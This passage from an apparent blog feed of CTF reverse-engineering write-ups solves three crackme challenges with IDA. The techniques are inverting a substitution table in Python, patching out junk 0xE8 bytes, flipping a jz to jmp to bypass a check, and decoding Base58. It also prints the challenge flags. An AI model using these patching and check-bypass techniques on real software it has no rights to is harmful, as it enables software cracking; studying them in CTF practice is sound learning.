16;</code>, i.e. v6 = (each input character / 16) % 16<br><code>v7 = (16 * v5 >> 4) % 16;</code></p><p><code>v7= v5%16</code></p><p><code>v8 = unk_402150[2 * v4];</code></p><p>v8 is the element at index 2*v4 of an array; call that array arr1 for now, so v8 = arr1[2*v4]</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> ( v8 < <span 
class="number">48</span> || v8 > <span class="number">57</span> )</span><br><span class="line"> v9 = v8 - <span class="number">87</span>;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line"> v9 = v8 - <span class="number">48</span>;</span><br></pre></td></tr></table></figure></div><p>This block checks whether v8 is a decimal digit character (48..57) and derives v9 from it accordingly.<br><code>v10 = byte_402151[2 * v4];</code> v10 is the element at index 2*v4 of another array; call that array arr2 for now, so v10 = arr2[2*v4]</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">if ( v10 < 48 || v10 > 57 )</span><br><span class="line"> v12 = v10 - 87;</span><br><span class="line">else</span><br><span class="line"> v12 = v10 - 48;</span><br></pre></td></tr></table></figure></div><p>Now comes the key point, the heart of the whole routine: the byte at index 16*v6+v7 of the array byte_4021A0 must equal (v11+v12) XOR 0x19.<br>Written concisely: byte_4021A0[16*v6+v7] == (v11+v12)^0x19</p><p>With all the logic sorted out, we reverse it. We need a string of exactly 35 characters such that every character gets past <code>if ( (unsigned __int8)byte_4021A0[16 * v6 + v7] != ((v11 + v12) ^ 0x19) )</code><br>without hitting the break; that string is presumably the flag. How do we obtain it? The simplest way is brute force: try every printable character one at a time and keep whichever makes the check hold. First, let's see what the arrays <code>byte_4021A0</code>, <code>byte_402151</code> and <code>byte_402150</code><br>contain.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/18/toNfHISLRenq6KJ.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>We can see that <code>byte_402151</code> and <code>byte_402150</code> are contiguous: byte_402150 holds <code>2a49f69c38395cde96d6de96d6f4e025484954d6195448def6e2dad67786e21d5adae6</code><br>and byte_402151 holds <code>a49f69c38395cde96d6de96d6f4e025484954d6195448def6e2dad67786e21d5adae6</code></p><p>Use Shift+E to extract the data of <code>byte_4021A0</code></p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" 
contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">unsigned</span> <span class="keyword">char</span> ida_chars[] =</span><br><span class="line">{</span><br><span class="line"> <span class="number">0x63</span>, <span class="number">0x7C</span>, <span class="number">0x77</span>, <span class="number">0x7B</span>, <span class="number">0xF2</span>, <span class="number">0x6B</span>, <span class="number">0x6F</span>, <span class="number">0xC5</span>, <span class="number">0x30</span>, <span class="number">0x01</span>, </span><br><span class="line"> <span class="number">0x67</span>, <span class="number">0x2B</span>, <span class="number">0xFE</span>, <span class="number">0xD7</span>, <span class="number">0xAB</span>, <span class="number">0x76</span>, <span class="number">0xCA</span>, <span class="number">0x82</span>, <span class="number">0xC9</span>, <span class="number">0x7D</span>, </span><br><span class="line"> <span class="number">0xFA</span>, <span class="number">0x59</span>, <span class="number">0x47</span>, <span class="number">0xF0</span>, <span class="number">0xAD</span>, <span class="number">0xD4</span>, <span class="number">0xA2</span>, <span class="number">0xAF</span>, <span class="number">0x9C</span>, <span class="number">0xA4</span>, </span><br><span class="line"> <span class="number">0x72</span>, <span class="number">0xC0</span>, <span class="number">0xB7</span>, <span class="number">0xFD</span>, <span class="number">0x93</span>, <span class="number">0x26</span>, <span class="number">0x36</span>, <span class="number">0x3F</span>, <span class="number">0xF7</span>, <span class="number">0xCC</span>, </span><br><span class="line"> <span class="number">0x34</span>, <span class="number">0xA5</span>, <span class="number">0xE5</span>, <span class="number">0xF1</span>, <span class="number">0x71</span>, <span class="number">0xD8</span>, <span class="number">0x31</span>, <span 
class="number">0x15</span>, <span class="number">0x04</span>, <span class="number">0xC7</span>, </span><br><span class="line"> <span class="number">0x23</span>, <span class="number">0xC3</span>, <span class="number">0x18</span>, <span class="number">0x96</span>, <span class="number">0x05</span>, <span class="number">0x9A</span>, <span class="number">0x07</span>, <span class="number">0x12</span>, <span class="number">0x80</span>, <span class="number">0xE2</span>, </span><br><span class="line"> <span class="number">0xEB</span>, <span class="number">0x27</span>, <span class="number">0xB2</span>, <span class="number">0x75</span>, <span class="number">0x09</span>, <span class="number">0x83</span>, <span class="number">0x2C</span>, <span class="number">0x1A</span>, <span class="number">0x1B</span>, <span class="number">0x6E</span>, </span><br><span class="line"> <span class="number">0x5A</span>, <span class="number">0xA0</span>, <span class="number">0x52</span>, <span class="number">0x3B</span>, <span class="number">0xD6</span>, <span class="number">0xB3</span>, <span class="number">0x29</span>, <span class="number">0xE3</span>, <span class="number">0x2F</span>, <span class="number">0x84</span>, </span><br><span class="line"> <span class="number">0x53</span>, <span class="number">0xD1</span>, <span class="number">0x00</span>, <span class="number">0xED</span>, <span class="number">0x20</span>, <span class="number">0xFC</span>, <span class="number">0xB1</span>, <span class="number">0x5B</span>, <span class="number">0x6A</span>, <span class="number">0xCB</span>, </span><br><span class="line"> <span class="number">0xBE</span>, <span class="number">0x39</span>, <span class="number">0x4A</span>, <span class="number">0x4C</span>, <span class="number">0x58</span>, <span class="number">0xCF</span>, <span class="number">0xD0</span>, <span class="number">0xEF</span>, <span class="number">0xAA</span>, <span class="number">0xFB</span>, </span><br><span class="line"> <span 
class="number">0x43</span>, <span class="number">0x4D</span>, <span class="number">0x33</span>, <span class="number">0x85</span>, <span class="number">0x45</span>, <span class="number">0xF9</span>, <span class="number">0x02</span>, <span class="number">0x7F</span>, <span class="number">0x50</span>, <span class="number">0x3C</span>, </span><br><span class="line"> <span class="number">0x9F</span>, <span class="number">0xA8</span>, <span class="number">0x51</span>, <span class="number">0xA3</span>, <span class="number">0x40</span>, <span class="number">0x8F</span>, <span class="number">0x92</span>, <span class="number">0x9D</span>, <span class="number">0x38</span>, <span class="number">0xF5</span>, </span><br><span class="line"> <span class="number">0xBC</span>, <span class="number">0xB6</span>, <span class="number">0xDA</span>, <span class="number">0x21</span>, <span class="number">0x10</span>, <span class="number">0xFF</span>, <span class="number">0xF3</span>, <span class="number">0xD2</span>, <span class="number">0xCD</span>, <span class="number">0x0C</span>, </span><br><span class="line"> <span class="number">0x13</span>, <span class="number">0xEC</span>, <span class="number">0x5F</span>, <span class="number">0x97</span>, <span class="number">0x44</span>, <span class="number">0x17</span>, <span class="number">0xC4</span>, <span class="number">0xA7</span>, <span class="number">0x7E</span>, <span class="number">0x3D</span>, </span><br><span class="line"> <span class="number">0x64</span>, <span class="number">0x5D</span>, <span class="number">0x19</span>, <span class="number">0x73</span>, <span class="number">0x60</span>, <span class="number">0x81</span>, <span class="number">0x4F</span>, <span class="number">0xDC</span>, <span class="number">0x22</span>, <span class="number">0x2A</span>, </span><br><span class="line"> <span class="number">0x90</span>, <span class="number">0x88</span>, <span class="number">0x46</span>, <span class="number">0xEE</span>, <span 
class="number">0xB8</span>, <span class="number">0x14</span>, <span class="number">0xDE</span>, <span class="number">0x5E</span>, <span class="number">0x0B</span>, <span class="number">0xDB</span>, </span><br><span class="line"> <span class="number">0xE0</span>, <span class="number">0x32</span>, <span class="number">0x3A</span>, <span class="number">0x0A</span>, <span class="number">0x49</span>, <span class="number">0x06</span>, <span class="number">0x24</span>, <span class="number">0x5C</span>, <span class="number">0xC2</span>, <span class="number">0xD3</span>, </span><br><span class="line"> <span class="number">0xAC</span>, <span class="number">0x62</span>, <span class="number">0x91</span>, <span class="number">0x95</span>, <span class="number">0xE4</span>, <span class="number">0x79</span>, <span class="number">0xE7</span>, <span class="number">0xC8</span>, <span class="number">0x37</span>, <span class="number">0x6D</span>, </span><br><span class="line"> <span class="number">0x8D</span>, <span class="number">0xD5</span>, <span class="number">0x4E</span>, <span class="number">0xA9</span>, <span class="number">0x6C</span>, <span class="number">0x56</span>, <span class="number">0xF4</span>, <span class="number">0xEA</span>, <span class="number">0x65</span>, <span class="number">0x7A</span>, </span><br><span class="line"> <span class="number">0xAE</span>, <span class="number">0x08</span>, <span class="number">0xBA</span>, <span class="number">0x78</span>, <span class="number">0x25</span>, <span class="number">0x2E</span>, <span class="number">0x1C</span>, <span class="number">0xA6</span>, <span class="number">0xB4</span>, <span class="number">0xC6</span>, </span><br><span class="line"> <span class="number">0xE8</span>, <span class="number">0xDD</span>, <span class="number">0x74</span>, <span class="number">0x1F</span>, <span class="number">0x4B</span>, <span class="number">0xBD</span>, <span class="number">0x8B</span>, <span class="number">0x8A</span>, <span 
class="number">0x70</span>, <span class="number">0x3E</span>, </span><br><span class="line"> <span class="number">0xB5</span>, <span class="number">0x66</span>, <span class="number">0x48</span>, <span class="number">0x03</span>, <span class="number">0xF6</span>, <span class="number">0x0E</span>, <span class="number">0x61</span>, <span class="number">0x35</span>, <span class="number">0x57</span>, <span class="number">0xB9</span>, </span><br><span class="line"> <span class="number">0x86</span>, <span class="number">0xC1</span>, <span class="number">0x1D</span>, <span class="number">0x9E</span>, <span class="number">0xE1</span>, <span class="number">0xF8</span>, <span class="number">0x98</span>, <span class="number">0x11</span>, <span class="number">0x69</span>, <span class="number">0xD9</span>, </span><br><span class="line"> <span class="number">0x8E</span>, <span class="number">0x94</span>, <span class="number">0x9B</span>, <span class="number">0x1E</span>, <span class="number">0x87</span>, <span class="number">0xE9</span>, <span class="number">0xCE</span>, <span class="number">0x55</span>, <span class="number">0x28</span>, <span class="number">0xDF</span>, </span><br><span class="line"> <span class="number">0x8C</span>, <span class="number">0xA1</span>, <span class="number">0x89</span>, <span class="number">0x0D</span>, <span class="number">0xBF</span>, <span class="number">0xE6</span>, <span class="number">0x42</span>, <span class="number">0x68</span>, <span class="number">0x41</span>, <span class="number">0x99</span>, </span><br><span class="line"> <span class="number">0x2D</span>, <span class="number">0x0F</span>, <span class="number">0xB0</span>, <span class="number">0x54</span>, <span class="number">0xBB</span>, <span class="number">0x16</span></span><br><span class="line">};</span><br></pre></td></tr></table></figure></div><p>Finally, the solve script:</p><div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" 
contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">table = [<span class="number">0x63</span>, <span class="number">0x7C</span>, <span class="number">0x77</span>, <span class="number">0x7B</span>, <span class="number">0xF2</span>, <span class="number">0x6B</span>, <span class="number">0x6F</span>, <span class="number">0xC5</span>, <span class="number">0x30</span>, <span class="number">0x01</span>,</span><br><span class="line"> <span class="number">0x67</span>, <span class="number">0x2B</span>, <span class="number">0xFE</span>, <span class="number">0xD7</span>, <span class="number">0xAB</span>, <span class="number">0x76</span>, <span class="number">0xCA</span>, <span class="number">0x82</span>, <span class="number">0xC9</span>, <span class="number">0x7D</span>,</span><br><span class="line"> <span class="number">0xFA</span>, <span class="number">0x59</span>, <span class="number">0x47</span>, <span class="number">0xF0</span>, <span class="number">0xAD</span>, <span class="number">0xD4</span>, <span class="number">0xA2</span>, <span class="number">0xAF</span>, <span class="number">0x9C</span>, <span class="number">0xA4</span>,</span><br><span class="line"> <span class="number">0x72</span>, <span class="number">0xC0</span>, <span class="number">0xB7</span>, <span class="number">0xFD</span>, <span class="number">0x93</span>, <span class="number">0x26</span>, <span class="number">0x36</span>, <span class="number">0x3F</span>, <span class="number">0xF7</span>, <span class="number">0xCC</span>,</span><br><span class="line"> <span class="number">0x34</span>, <span class="number">0xA5</span>, <span class="number">0xE5</span>, <span class="number">0xF1</span>, <span class="number">0x71</span>, <span class="number">0xD8</span>, <span class="number">0x31</span>, <span class="number">0x15</span>, <span class="number">0x04</span>, <span class="number">0xC7</span>,</span><br><span class="line"> <span 
class="number">0x23</span>, <span class="number">0xC3</span>, <span class="number">0x18</span>, <span class="number">0x96</span>, <span class="number">0x05</span>, <span class="number">0x9A</span>, <span class="number">0x07</span>, <span class="number">0x12</span>, <span class="number">0x80</span>, <span class="number">0xE2</span>,</span><br><span class="line"> <span class="number">0xEB</span>, <span class="number">0x27</span>, <span class="number">0xB2</span>, <span class="number">0x75</span>, <span class="number">0x09</span>, <span class="number">0x83</span>, <span class="number">0x2C</span>, <span class="number">0x1A</span>, <span class="number">0x1B</span>, <span class="number">0x6E</span>,</span><br><span class="line"> <span class="number">0x5A</span>, <span class="number">0xA0</span>, <span class="number">0x52</span>, <span class="number">0x3B</span>, <span class="number">0xD6</span>, <span class="number">0xB3</span>, <span class="number">0x29</span>, <span class="number">0xE3</span>, <span class="number">0x2F</span>, <span class="number">0x84</span>,</span><br><span class="line"> <span class="number">0x53</span>, <span class="number">0xD1</span>, <span class="number">0x00</span>, <span class="number">0xED</span>, <span class="number">0x20</span>, <span class="number">0xFC</span>, <span class="number">0xB1</span>, <span class="number">0x5B</span>, <span class="number">0x6A</span>, <span class="number">0xCB</span>,</span><br><span class="line"> <span class="number">0xBE</span>, <span class="number">0x39</span>, <span class="number">0x4A</span>, <span class="number">0x4C</span>, <span class="number">0x58</span>, <span class="number">0xCF</span>, <span class="number">0xD0</span>, <span class="number">0xEF</span>, <span class="number">0xAA</span>, <span class="number">0xFB</span>,</span><br><span class="line"> <span class="number">0x43</span>, <span class="number">0x4D</span>, <span class="number">0x33</span>, <span class="number">0x85</span>, <span 
class="number">0x45</span>, <span class="number">0xF9</span>, <span class="number">0x02</span>, <span class="number">0x7F</span>, <span class="number">0x50</span>, <span class="number">0x3C</span>,</span><br><span class="line"> <span class="number">0x9F</span>, <span class="number">0xA8</span>, <span class="number">0x51</span>, <span class="number">0xA3</span>, <span class="number">0x40</span>, <span class="number">0x8F</span>, <span class="number">0x92</span>, <span class="number">0x9D</span>, <span class="number">0x38</span>, <span class="number">0xF5</span>,</span><br><span class="line"> <span class="number">0xBC</span>, <span class="number">0xB6</span>, <span class="number">0xDA</span>, <span class="number">0x21</span>, <span class="number">0x10</span>, <span class="number">0xFF</span>, <span class="number">0xF3</span>, <span class="number">0xD2</span>, <span class="number">0xCD</span>, <span class="number">0x0C</span>,</span><br><span class="line"> <span class="number">0x13</span>, <span class="number">0xEC</span>, <span class="number">0x5F</span>, <span class="number">0x97</span>, <span class="number">0x44</span>, <span class="number">0x17</span>, <span class="number">0xC4</span>, <span class="number">0xA7</span>, <span class="number">0x7E</span>, <span class="number">0x3D</span>,</span><br><span class="line"> <span class="number">0x64</span>, <span class="number">0x5D</span>, <span class="number">0x19</span>, <span class="number">0x73</span>, <span class="number">0x60</span>, <span class="number">0x81</span>, <span class="number">0x4F</span>, <span class="number">0xDC</span>, <span class="number">0x22</span>, <span class="number">0x2A</span>,</span><br><span class="line"> <span class="number">0x90</span>, <span class="number">0x88</span>, <span class="number">0x46</span>, <span class="number">0xEE</span>, <span class="number">0xB8</span>, <span class="number">0x14</span>, <span class="number">0xDE</span>, <span class="number">0x5E</span>, <span 
class="number">0x0B</span>, <span class="number">0xDB</span>,</span><br><span class="line"> <span class="number">0xE0</span>, <span class="number">0x32</span>, <span class="number">0x3A</span>, <span class="number">0x0A</span>, <span class="number">0x49</span>, <span class="number">0x06</span>, <span class="number">0x24</span>, <span class="number">0x5C</span>, <span class="number">0xC2</span>, <span class="number">0xD3</span>,</span><br><span class="line"> <span class="number">0xAC</span>, <span class="number">0x62</span>, <span class="number">0x91</span>, <span class="number">0x95</span>, <span class="number">0xE4</span>, <span class="number">0x79</span>, <span class="number">0xE7</span>, <span class="number">0xC8</span>, <span class="number">0x37</span>, <span class="number">0x6D</span>,</span><br><span class="line"> <span class="number">0x8D</span>, <span class="number">0xD5</span>, <span class="number">0x4E</span>, <span class="number">0xA9</span>, <span class="number">0x6C</span>, <span class="number">0x56</span>, <span class="number">0xF4</span>, <span class="number">0xEA</span>, <span class="number">0x65</span>, <span class="number">0x7A</span>,</span><br><span class="line"> <span class="number">0xAE</span>, <span class="number">0x08</span>, <span class="number">0xBA</span>, <span class="number">0x78</span>, <span class="number">0x25</span>, <span class="number">0x2E</span>, <span class="number">0x1C</span>, <span class="number">0xA6</span>, <span class="number">0xB4</span>, <span class="number">0xC6</span>,</span><br><span class="line"> <span class="number">0xE8</span>, <span class="number">0xDD</span>, <span class="number">0x74</span>, <span class="number">0x1F</span>, <span class="number">0x4B</span>, <span class="number">0xBD</span>, <span class="number">0x8B</span>, <span class="number">0x8A</span>, <span class="number">0x70</span>, <span class="number">0x3E</span>,</span><br><span class="line"> <span class="number">0xB5</span>, <span 
class="number">0x66</span>, <span class="number">0x48</span>, <span class="number">0x03</span>, <span class="number">0xF6</span>, <span class="number">0x0E</span>, <span class="number">0x61</span>, <span class="number">0x35</span>, <span class="number">0x57</span>, <span class="number">0xB9</span>,</span><br><span class="line"> <span class="number">0x86</span>, <span class="number">0xC1</span>, <span class="number">0x1D</span>, <span class="number">0x9E</span>, <span class="number">0xE1</span>, <span class="number">0xF8</span>, <span class="number">0x98</span>, <span class="number">0x11</span>, <span class="number">0x69</span>, <span class="number">0xD9</span>,</span><br><span class="line"> <span class="number">0x8E</span>, <span class="number">0x94</span>, <span class="number">0x9B</span>, <span class="number">0x1E</span>, <span class="number">0x87</span>, <span class="number">0xE9</span>, <span class="number">0xCE</span>, <span class="number">0x55</span>, <span class="number">0x28</span>, <span class="number">0xDF</span>,</span><br><span class="line"> <span class="number">0x8C</span>, <span class="number">0xA1</span>, <span class="number">0x89</span>, <span class="number">0x0D</span>, <span class="number">0xBF</span>, <span class="number">0xE6</span>, <span class="number">0x42</span>, <span class="number">0x68</span>, <span class="number">0x41</span>, <span class="number">0x99</span>,</span><br><span class="line"> <span class="number">0x2D</span>, <span class="number">0x0F</span>, <span class="number">0xB0</span>, <span class="number">0x54</span>, <span class="number">0xBB</span>, <span class="number">0x16</span>]</span><br><span class="line">s = bytes.fromhex(<span class="string">"2a49f69c38395cde96d6de96d6f4e025484954d6195448def6e2dad67786e21d5adae6"</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(s)):</span><br><span class="line"> v = table.index(s[i]^<span 
class="number">0x19</span>)</span><br><span class="line"> print(chr(v), end=<span class="string">''</span>)</span><br></pre></td></tr></table></figure></div><p>This yields the flag:</p><div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line">flag{Th1s_1s_Simple_Rep1ac3_Enc0d3}</span><br></pre></td></tr></table></figure></div>]]></content>
<summary type="html">
<h3 id="2018湘湖杯逆向题"><a href="#2018湘湖杯逆向题" class="headerlink" title="2018 Xianghu Cup reverse engineering challenge"></a>2018 Xianghu Cup reverse engineering challenge</h3>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
<entry>
<title>echo-server</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/12/17/echo-server/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/12/17/echo-server/</id>
<published>2020-12-17T07:57:25.682Z</published>
<updated>2021-01-11T01:42:26.603Z</updated>
<content type="html"><![CDATA[<p>XCTF 3rd-NJCTF-2017</p><a id="more"></a><h3 id="0x01-查壳"><a href="#0x01-查壳" class="headerlink" title="0x01. Packer check"></a>0x01. Packer check</h3><p>Checking with the ExeinfoPe tool shows a 32-bit program with no packer.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/WN8wG1tdH9ID5bX.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="0x02-使用IDA进行反编译"><a href="#0x02-使用IDA进行反编译" class="headerlink" title="0x02. Decompiling with IDA"></a>0x02. Decompiling with IDA</h3><p>Open the program in 32-bit IDA.</p><h3 id="0x03-分析程序"><a href="#0x03-分析程序" class="headerlink" title="0x03. Analyzing the program"></a>0x03. Analyzing the program</h3><p>The challenge hint says "Enter the key to get the flag."<br>Locate the main function and press F5 to view the pseudocode.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/hJkSTpsnbQ1ogHK.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>The pseudocode of main is fairly clear: main calls only one key function, but the call itself looks odd. I suspected something was wrong here.</p><div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line">((<span class="keyword">void</span> (*)(<span class="keyword">void</span>))((<span class="keyword">char</span> *)&loc_80487C1 + <span class="number">3</span>))();</span><br></pre></td></tr></table></figure></div><p>Switch back to the assembly view and read the assembly directly.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/31pxl2iAOFP5R9q.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Double-click the function to follow it.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/ZqF3svJhkOITYXW.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>After double-clicking, IDA lands here. From the call in main we know execution should go to <code>loc_80487C1+3</code>, but the assembly at that location is garbage, which tells us the program is obfuscated; we need to strip the junk instructions.<br>At <code>0x080487C1</code> press D to convert the assembly there into data; I had to press D twice before the conversion completed.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/kRunCHvQdAm31pG.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p><code>0x80487C1</code> should now look like this. The byte at <code>0x80487C1</code> is 0xE8, an opcode often used for this kind of obfuscation. Patch it to 0x90 in IDA, then press C at <code>0x80487C2</code>; IDA now disassembles <code>0x80487C2</code> and <code>0x80487C3</code> correctly. Going back to the call in main, it has become <code>call near ptr unk_80487C4</code>. Return to <code>unk_80487C4</code> and press C; the disassembly now looks like a normal function prologue.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/KkRU7MtAq8yIfud.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Continue downward.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/FdtpmjP91JX7DlU.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Here there is a jmp as strange as the call in main: <code>jmp short near ptr loc_80487F3+1</code>. Looking closely, the instruction occupies two bytes and jumps to its own second byte, so it effectively nops out the first byte.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/9n3pQcmTCqhGIBZ.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Looking at the machine code, the byte at <code>0x80487F3</code> is 0xE8. 0xE8 is also commonly used for obfuscation, and combined with the previous step we can tell this 0xE8 is here to disrupt IDA's static analysis, so we patch it directly to 0x90.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/In6Fe3blwKksxaO.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Another block of assembly then comes back to normal. I then noticed an address at <code>0x08048816</code> that IDA highlights in red. The two instructions before <code>0x08048816</code> amount to an unconditional jump:</p><div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">xor</span> eax, eax</span><br><span class="line">jz short loc_804881D</span><br></pre></td></tr></table></figure></div><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/YF98Jj4iOboLqum.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>After <code>0x08048816</code> there is a comparison whose operand is the address <code>0x8048817h</code>, so I guessed that the bytes at <code>0x08048816</code> are data rather than code. Press D to convert them to data and take a look.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/p4CofPbSYNyLr2g.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>They are indeed data. Press A at <code>0x08048817</code> to convert them into a string.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/Tn5Pz2wWJtXBKUv.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Below the string there is a comparison, followed by the message "You are very close! Now patch me~".<br>So the string the program expects from the user is "F1@gA". Run the program and try it.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/ji8WHGM2JR1uTdK.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>The comparison does pass, but no flag is printed; the program says it needs patching. Keep reading to find out why it stops here.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/kevYh7iaBxWG1X5.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>There is another strange jump here. I tried restoring it with the method above, but it still looked odd, so I set it aside for now. I also noticed a jump below "You are very close! Now patch me~".</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/W6J4ts3zwGSfumg.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Whether this jump is taken depends on the value of <code>dword_804A088</code>. Press X on <code>dword_804A088</code> to list its cross-references and see where its value comes from.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/Au9JcpmniwZ5QgU.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Follow the reference.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/HgM7FnUdhxEVAjf.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>The value at <code>dword_804A088</code> is hard-coded to 1 in main.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/SX1QFjmkRoTxhzl.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Since EAX is 1, <code>test eax,eax</code> clears ZF, and jz does not jump when ZF is 0, so this jz is never taken.<br>Patch it to jmp and save the program.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/YkN31GgIVDPszoF.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>The flag is obtained: F8C60EB40BF66919A77C4BD88D45DEF4</p>]]></content>
<summary type="html">
<p>XCTF 3rd-NJCTF-2017</p>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
<entry>
<title>test_re</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/12/17/test_re/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/12/17/test_re/</id>
<published>2020-12-17T07:35:41.374Z</published>
<updated>2021-01-11T01:42:43.950Z</updated>
<content type="html"><![CDATA[<p>2019 Xihu Lunjian (West Lake Sword Debate) qualifier</p><a id="more"></a><p>The Base58 alphabet: 123456789abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ</p><p>It consists of the nine digits 1 to 9 and the English letters minus the ones that are easily confused (0: the digit zero, O: uppercase O, I: uppercase i, l: lowercase L).</p><p>Encoding procedure:</p><p>① Convert the string to be encoded into its ASCII codes (a sequence of ASCII codes is effectively a base-256 number).</p><p>For example, "ABD" becomes 65 66 68.</p><p>② Convert the base-256 number to decimal: 65*256*256+66*256+68=4276804</p><p>③ Convert the decimal number to base 58 by repeatedly taking the remainder modulo 58, which gives 21 53 20 0.</p><p>④ Look up the characters for 21 53 20 0 in the alphabet to get the Base58 ciphertext: nVm1</p><p>Decoding is the reverse of encoding.</p><p>In summary, encoding converts the characters to be encoded to base 256, then to decimal, then to base 58, and finally looks each digit up in the alphabet; decoding looks the characters up in the alphabet to get the base-58 digits, converts to decimal, then to base 256, and finally maps the bytes back to characters through the ASCII table.</p><p>Packer check: no packer, 64-bit file.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/GOS78lKai1u4UcI.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Load it into IDA and look at the main function.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/ZuwpfOI3U6oSPGr.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Analysis shows that sub_400D00 essentially reads the input string.</p><p>Look at sub_400700.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/Ib89PemyNpDth23.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>From the logic, s should be the string after some encoding step, and the following D9, cS9N and so on should be the ciphertext, which is D9cS9N9iHjMLTdA8YSMRMp (note the offsets added to s, such as s+2). Analysis shows that s is assigned from v11, so focus on v11; operations on other variables were mixed in as obfuscation, and only the encoding steps involving v11 matter.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/1cx5JXpHdglKyjs.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Based on the 